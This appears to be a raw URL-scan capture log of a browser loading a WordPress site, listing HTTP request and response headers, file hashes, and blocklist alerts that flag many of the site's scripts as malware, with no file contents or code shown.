Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 121205
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-1d975"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (65367), with CRLF line terminators
Size:   121205
Md5:    5057f321f0dc85cd8da94a0c5f67a8f4
Sha1:   224c9f9ad11b495358aa61dbd53e838e9b61015b
Sha256: 5a3d8c05785485d36ee5c94d4681e5b1d9e4b94c5be8b5bd7b0f3168fff1bd9a
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 11224
Last-Modified: Wed, 09 Dec 2020 01:46:07 GMT
Connection: keep-alive
ETag: "5fd02c5f-2bd8"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (11126)
Size:   11224
Md5:    79b4956b7ec478ec10244b5e2d33ac7d
Sha1:   a46025b9d05e3df30d610a8aef14f392c7058dc9
Sha256: 029e0a2e809fd6b5dbe76abe8b7a74936be306c9a8c27c814c4d44aa54623300
                                        
                                            GET /wp-content/plugins/bold-page-builder/css/front_end/content_elements.crush.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 169715
Last-Modified: Sat, 15 Dec 2018 00:14:20 GMT
Connection: keep-alive
ETag: "5c14475c-296f3"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (375)
Size:   169715
Md5:    01b9ed8361ac110e6380291ff10c49bb
Sha1:   4714494963a3f570e8b3aa421dc1fdcacda61686
Sha256: ac1649da8b6b8af80052e155bc6c541f856ebc5518dd821917cb9d2af185fbeb

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/bold-page-builder/content_elements_misc/js/jquery.magnific-popup.min.js?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 20216
Last-Modified: Sat, 15 Dec 2018 00:14:21 GMT
Connection: keep-alive
ETag: "5c14475d-4ef8"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (20087)
Size:   20216
Md5:    ba6cf724c8bb1cf5b084e79ff230626e
Sha1:   f455c5f153f872e52265f87a644ff89fe14a6fb6
Sha256: 3fddc6d28aba3c13d64cfd4847c333ff48c71d4a5a58bd1a0494ca6ae8ac1bb4

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/bold-page-builder/content_elements_misc/js/content_elements.js?ver=1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 11449
Last-Modified: Sat, 15 Dec 2018 00:14:21 GMT
Connection: keep-alive
ETag: "5c14475d-2cb9"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   11449
Md5:    48cbee507f3dae11bf77ee121773de1f
Sha1:   d98267a8425d20f7b4c26c0cb4ad12923331c7f7
Sha256: 950c96741e3d568a9fdfef3d404c191b866f9886343e80157f231a76c38c0f6e

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/bold-page-builder/slick/slick.min.js?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 41953
Last-Modified: Sat, 15 Dec 2018 00:14:20 GMT
Connection: keep-alive
ETag: "5c14475c-a3e1"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (32076)
Size:   41953
Md5:    b53bdfc29e18f4d493d775a8023fbdc8
Sha1:   e9fcbcc4fa70cba093b81d982a1b78509414cef7
Sha256: e02af7df9a190d88380e2dcec2050ecaa493ae2d23526dbeec67f6907df3a752
                                        
                                            GET /wp-content/plugins/bold-page-builder/script_fe.js?ver=1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 1515
Last-Modified: Sat, 15 Dec 2018 00:14:20 GMT
Connection: keep-alive
ETag: "5c14475c-5eb"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1515
Md5:    64e162bfa1349e3af675c362d13a434d
Sha1:   cf8f729189bf60aa78a4343156af15b17ca95376
Sha256: e9a06715f6f1880744b7f342c069c20b7e1f4748353661fe258a90e36cf6b03e
                                        
                                            GET /wp-content/themes/denorious/js/bootstrap.min.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 37051
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-90bb"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (32033), with CRLF line terminators
Size:   37051
Md5:    04c84852e9937b142ac73c285b895b85
Sha1:   8fb8a9319055253d085edfc3bb72d20f614ec709
Sha256: 36460e494e4c628443afded40b2743b5ede9a4a76fb4f7b9ef2345cc7e59fd64

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: 9c5Goaj+fCkDzgxDlVkXSg==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

search
                                         52.42.234.253
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: eiztnprtsCl08kwIb6Vti1HJq/k=

                                        
                                            GET /wp-content/themes/denorious/js/jquery.circliful.min.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 7473
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-1d31"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (7473), with no line terminators
Size:   7473
Md5:    0015194159d744b4e38956ac30824a42
Sha1:   eac31a82b15ac4208b9c78c95c13e77f4583faae
Sha256: 74da2b4001c15b8f46a26988c47632845d06706e46388fc3d08b99ec3797d63f

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/js/isotope.pkgd.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 35631
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-8b2f"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (32003), with CRLF line terminators
Size:   35631
Md5:    d5e00cf73d518ca8d72c253c51e6014a
Sha1:   409130ec6321c17ebf6743f6ae0816e5ddda7235
Sha256: 7fe76fc5d85d4e5b0b7d32c7c9ff88a3f6556342efa6d29d701344ffc76afadd
                                        
                                            GET /wp-content/themes/denorious/js/jquery.downCount.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 3912
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-f48"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   3912
Md5:    a9d6fbb86150e591450bffc00f4495ec
Sha1:   a96d906cce8c4f5ab70cf3db5b406ae45749a0ab
Sha256: 03346673b82670f1cb0a3b4752ec028eb4f824789a23ea09f0052ed019bd27f2

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 89684
Last-Modified: Wed, 02 Nov 2022 01:45:15 GMT
Connection: keep-alive
ETag: "6361cbab-15e54"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (65447)
Size:   89684
Md5:    17738318d61d394f1de8890d589afaec
Sha1:   f6d0c4dc1399cf02d53f5753ad46573a8bbc2ac3
Sha256: cc7403bab52ed166e24ea9324241045af370be482f5b594468f4a6ac6e7e7981

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/js/lity/lity.min.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 6300
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-189c"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (6182), with CRLF line terminators
Size:   6300
Md5:    94b383e7c707143030616886285cfb9d
Sha1:   0e83bc0de47df518e8ba555cb1ac25679d87a58a
Sha256: 6648f671f84f72381200422772ca242a920e4a73aa82bbb16427f431ed697a57

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/js/jflickrfeed.min.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 1731
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-6c3"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (425), with CRLF line terminators
Size:   1731
Md5:    edddf66884fe1a84ed2bfadf5de6b61c
Sha1:   cd8b2cdc1137045fd67fdd1cf3cad81e2752b717
Sha256: 7331e568d44900f570f233a6cc0022a6a8f272f6fdabcae6ddc2092fe1c00c1a
                                        
                                            GET /wp-content/themes/denorious/js/denorious-main.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 24287
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-5edf"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (361), with CRLF line terminators
Size:   24287
Md5:    46764122abcc49de21642b9ce7c9a2bc
Sha1:   de1598419d1fb144127a6cd515361e8f2a862879
Sha256: 7446f8cb6fa7fe4057c203d756f674a770a44fdcb35ae10cb3339dccdb5abe0b

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/comment-reply.min.js?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 2981
Last-Modified: Wed, 25 May 2022 00:45:28 GMT
Connection: keep-alive
ETag: "628d7c28-ba5"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (2946)
Size:   2981
Md5:    492f2c1a7ea7eb83fe42e0ff7cb51aa2
Sha1:   db36a77f6aaa2063bfbec02c2c0e967438c5a245
Sha256: e174a58a503ab84b3d1b9de12fd3895788204485170f1289e445f7b5b98ec789

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/js/scrolltotop/totop.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 350
Connection: keep-alive
X-Accel-Version: 0.01
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
ETag: "15e-56695f8083140"
Accept-Ranges: bytes
X-Powered-By: PleskLin


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   350
Md5:    fef49f0a44ef1fc44ab88f0886477c3d
Sha1:   06f0634ca101345a00d031eb030d9e9a0388a510
Sha256: 4beea5ce78bf433084986f1f0e276befbaf2369a177916fce61e11a582af0716

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/uploads/2018/03/cropped-logo-1.png HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 4976
Last-Modified: Sun, 04 Mar 2018 13:16:07 GMT
Connection: keep-alive
ETag: "5a9bf197-1370"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 110 x 35, 8-bit/color RGBA, non-interlaced\012- data
Size:   4976
Md5:    5fdfa151fcbd7ed32131ebf1287f60fc
Sha1:   db840bf8bc9b2747d2e0df31ed481365f01b6c07
Sha256: 729aff3358b158a6d81654923d6e010e5f88c104bdd81763ce74f636896b2657
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-content/themes/denorious/images/header.jpg HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 30041
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-7559"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1600x222, components 3\012- data
Size:   30041
Md5:    625775bf96b47aa5d45407db753c9b6f
Sha1:   007af18195eb5571dfd7291c15306444979bd659
Sha256: 0f611266e12d9b6a92bbbbe0060b02cf00b74078973618c4ace72bbcf95c16fc
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "83FE5B11088985D78E51CB2E1457525F91C9BBF9C42ECA17D19A6CFFF734147A"
Last-Modified: Fri, 04 Nov 2022 03:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Sat, 05 Nov 2022 02:42:22 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            GET /s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.edmunion.eu
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 30928
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 03 Nov 2022 16:40:18 GMT
expires: Fri, 03 Nov 2023 16:40:18 GMT
cache-control: public, max-age=31536000
age: 100924
last-modified: Mon, 11 Jul 2022 18:57:39 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 30928, version 1.0\012- data
Size:   30928
Md5:    ac0d2859ea5f8fd6bcb3c305c08ec184
Sha1:   7f6c17e3e592cd8bd346b9cc261d8dd961b8aef7
Sha256: ae919a7c9f25f0fd97fc18e398ae8e453fcaae487e4a4cb4f896e7fecde4a780
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/arimo/v27/P5sMzZCDf9_T_10ZxCE.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.edmunion.eu
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 18260
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 03 Nov 2022 17:03:31 GMT
expires: Fri, 03 Nov 2023 17:03:31 GMT
cache-control: public, max-age=31536000
age: 99531
last-modified: Mon, 11 Jul 2022 21:03:24 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 18260, version 1.0\012- data
Size:   18260
Md5:    6dea752293556883fdae057d588b0bb1
Sha1:   e4d090e03bb920f5ddf7b09937428b2a0a2a9ee0
Sha256: 1ff84f1e03eb15dedc4668f0817372b734934076bc936e12c5c0bd3944dab0c0
                                        
                                            GET /s/poppins/v20/pxiEyp8kv8JHgFVrJJfecg.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.edmunion.eu
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 7884
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 02 Nov 2022 21:48:50 GMT
expires: Thu, 02 Nov 2023 21:48:50 GMT
cache-control: public, max-age=31536000
age: 168812
